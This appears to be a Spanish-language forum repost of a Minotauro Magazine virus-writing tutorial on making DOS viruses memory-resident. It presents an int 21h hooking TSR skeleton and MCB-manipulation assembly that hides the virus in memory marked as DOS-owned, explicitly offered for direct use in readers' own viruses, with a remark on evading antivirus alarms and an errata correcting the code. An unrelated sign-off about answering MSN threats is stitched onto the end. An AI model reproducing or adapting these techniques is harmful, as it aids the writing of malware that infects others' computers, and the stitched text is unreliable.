- Instalación de un virus en la memoria del ordenador -





Este artículo intenta explicar los métodos mas usados de residencia, con un enfoque mas práctico que teórico, dejando en claro lo fundamental para poder aprovecharlos, en especial el de MCB. Muestra ejemplos de los 2 tipos de técnicas descritos, que pueden (en el caso del MCB) usarse directamente en sus propios virus.

La teoría no esta muy detallada, pero se encontrará todo lo necesario para que el novato comprenda y pueda usar estos métodos. Y con la información del articulo, si desea profundizar la teoría, es sólo cuestión de leer alguna guía o manual, que hable sobre la memoria, ya que aquí se explica lo básico necesario (espero...).


Empezemos:

Los métodos más usados para dejar a un virus residente son:

los que el DOS proporciona o el método de MCB (Memory Control Block).



La primera forma es la más simple, pero también la mas ineficaz,

primero porque le informa al DOS que se esta dejando algo residente... además al ejecutarse esa función retorna el control al DOS. El programa que se intente ejecutar termina!. El virus que use esta técnica para evitar salir al DOS en su instalacion en memoria tiene que reejecutarse. Para quedar residente, se ejecuta a si mismo otra vez (serv. 4bh), y en su segunda ejecución ejecuta una int 27h o llama al servicio 31 de la int. 21h, esta a su vez, le da el control al programa padre, al que se cargo primero, y este puede entonces terminar, ejecutando al anfitrión. Si esto no se hiciera, alejecutar una int 21, por ejemplo, se le cedería el control al interprete de comandos...

Una de las característica de los virus que usan esta técnica es que suelen colocarse al principio de los archivos, estos servicios dejaran residente la cantidad de parrafeo que se les indique desde el comienzo del programa en memoria... Si tenemos un COM de 50K y el virus al final, al usar la int 27h, y dejar residente, por ejemplo, 1k, lo que quedaría seria el primer K del COM, no el virus que esta al final....
Es evidente que no podemos dejar 50k residente... para que el virus quede en memoria se puede relocar(mover), a otro bloque, trasferirle el control, y luego este le cederá el control al programa padre...

Para evitar esto, muchos se colocan al principio del programa que infectan.

Claro que esto es lento, porque hay que leer todo el file, y luego escribirlo después del virus, lo que no pasa si va al final, en ese caso solo hay que escribir el virus, no el virus y el archivo.

Este método es poco elegante, además de lento si se infecta dejando el virus al comienzo, entre otras cosas...

Abajo, sigue un fuente de un TSR, no de un virus!, solo un TSR normal para ilustrar su funcionamiento.

Este ejemplo intercepta la int. 21 y luego le pasa el control sin hacer nada. Se le puede agregar el código para hacer lo que se quiera.



===============================================================================

===============================================================================

code segment

assume cs:code,ds:code

Org 100h

Start:

Jmp instalar ; salta a la rutina de

; Instalación.



; En esta variable va la dirección original de la int 21h.

old_21 dd 2



new_21:



; Acá va la rutina que se cuelga de la interrupción 21h.



Jmp cs:[old_21] ;salta a la int original.



Instalar:



; Obtengo el vector original de la int 21

mov ax, 3521h

int 21h

mov word ptr old_21, bx

mov word ptr old_21+2, es



; Sesteo el nuevo vector de la int 21

mov ax,2521h

push cs

pop ds

mov dx, offset new_21

int 21h



;Queda residente

mov ah, 31h

mov dx, 30d ;ß-- Cantidad de parrafeo(16 bytes) a dejar int 21h ; residentes.
code ends end star

El segundo método es el de MCB, este es un poco mas complejo que simplemente llamar a al int
27h, pero es mucho mas eficaz. Para entender como funciona hay que saber que el dos crea un
bloque de control por cada bloque de memoria que use, este bloque de control, mide 16 bytes,
un párrafo y esta justo por encima del bloque de memoria asignado. En un .COM, por ejemplo,
en cs - 1, esta la dirección de este bloque. En el Offset 3 del mismo esta la cantidad de
memoria usada por ese programa..., para poder dejar residente un prog. hay que restarle a ese
valor la longitud del virus, luego liberar la memoria que ya no usa (servicio 4ah) y asignarla
(servicio 48h) a nuesto prog. Para terminar, marcamos el MCB del segmento al que movimos nuestro
virus con '8' en el Offset 1, para que el dos piense que es parte suya y no use esa memoria. En
ese Offset se coloca una marca, para identificar al bloaque, para esta rutina usamos 8 poruque
es el que usa el DOS. El código que sigue muestra como se hace... Este code sirve para dejar un
virus residente desde un COM, si se carga desde un EXE hay que tener en cuanta que el segmento
del MCB a modificar lo obtenemos de restarle 1 a DS y no a CS.;Paso a AX el Code Segment, lo
decremento y paso a ES, para obtener; la memoria reservada por el programa anfitrión (ES:[3]),
que queda en AX... mov ax, cs ;Con esto obtenemos el segmento dec ax ;del MCB. mov es, ax ;Acá
estamos obteniendo del campo mov ax, es:[3] ;del MCB, la memoria utilizada. ; Resto a la memoria
usada por el anfitrión la longitud del virus, el resultado ;en AX. sub ax, bx ;En BX esta la
longitud del virus, ;en párrafos.
; Paso el resultado de la operacion anterior a BX, para después llamar al servicio de liberar memoria, que se llama com BX, con el nuevo tamaño y con ;el
asegmento en ES. push bx ;Salvo la cantidad de mem a reservar. mov bx, ax ;Le paso la nueva
cantidad a BX. push cs pop es mov ah,4ah int 21h ;Asigno la memoria liberada a mi virus, el
segmento de la memoria asignada ;queda en AX. Decremento BX porque un párrafo lo va a usar el
DOS.... pop bx ;Popeo la cantidad de mem a reservar. dec bx mov ah, 48h int 21h ;Decremento AX,
Y lo paso a ES, de esa forma apunto al párrafo que usa el DOS; como control, marco ese párrafo en el Offset 1 con 8, para que el DOS lo ;considere como parte suya y no utilice esa zona de memoria.
; Después incremento AX otra vez y lo paso a ES, para que ES quede apuntando; a la memoria que el
virus usara. dec ax mov es, ax mov word ptr es:[1], 8 mov word ptr es:[8],'XX' ;Opcional, un
nombre al bloque. inc ax mov es, ax push es ;Salvo la dir del seg Del virus Ahora lo que queda es
mover el virus al segmento reservado, esto es cuestión de hacer un rep movsb al segmento al que
apunta ES y listo, el virus esta residente. NOTA: La rutina en si no hace saltar ninguna alarma,
la alarma de residencia del TB salta cuando detecta la actualización de la int 21h o 13h.

Fé de
Ratas.. - mov ax, cs ;Con esto obtenemos el segmento dec ax ;del MCB. mov es, ax ;Aca estamos
obteniendo del campo mov ax, es:[3] ;del MCB, la memoria utilizada. ;**** ;El problema de esto,
es que en ningún momento se aclara que tenemos que declarar el tamaño del virus un poco mas
grande, exactamente un párrafo mas largo. ; Esto por qué? Y bueno, en el momento en que tenemos
que restarle un párrafo a ;la memoria que queremos reservar (esto lo hacíamos para dar lugar a
que se ;cree el MCB del nuevo bloque), estamos reservando un párrafo menos de virus ;también..
ósea que la última parte del virus no entraría en la memoria reservada.. Puede ser que no
traiga problemas por ser un rea de datos o algo por ;el estilo, pero es aconsejable hacer las
cosas bien, o no ? ;-); Bueno, la manera de solucionar esto es simplemente Incrementar la cantidad de párrafos del virus o si lo declaran en su programa con un TAMAÑO DE PÁRRAFOS EQU
((FIN-COMIENZO)/16)+1 ; ; declara el incremento directamente ahí, para no gastar bytes ni
clocks : ; ; TAMAÑO_EN_PÁRRAFOS EQU ((FIN-COMIENZO+15)/16)+1 ; ;**** sub ax, bx ;En BX esta la longitud del virus, ;en párrafos. (ahora incrementada). push bx ;Salvo la cantidad de mem a
reservar. mov bx, ax ;Le paso la nueva cantidad a BX. push cs pop es mov ah, 4ah int 21h pop bx ;
Popeo la cantidad de mem a reservar. dec bx mov ah, 48h int 21h dec ax mov es, ax mov word ptr
es:[1], 8 mov word ptr es:[8],'XX' ;Opcional, un nombre al bloque. inc ax mov es, ax push es ;Salvo
la DIR del seg. del virus ... ;Bla.. Bla.. Bla.. y sigue el código ...DTM - Dead to Minotauro BBS
silly Troyan installer. Text by Zarathustra for Minotauro Magazine


Bueno mi intención es que los que recibieron cualquier tipo de amenaza, ya sea por msn o por lo que sea sepan respondreles.

Espero que les aya gustado mi segundo post, si les gusto me avisan q suvo mas
[/color]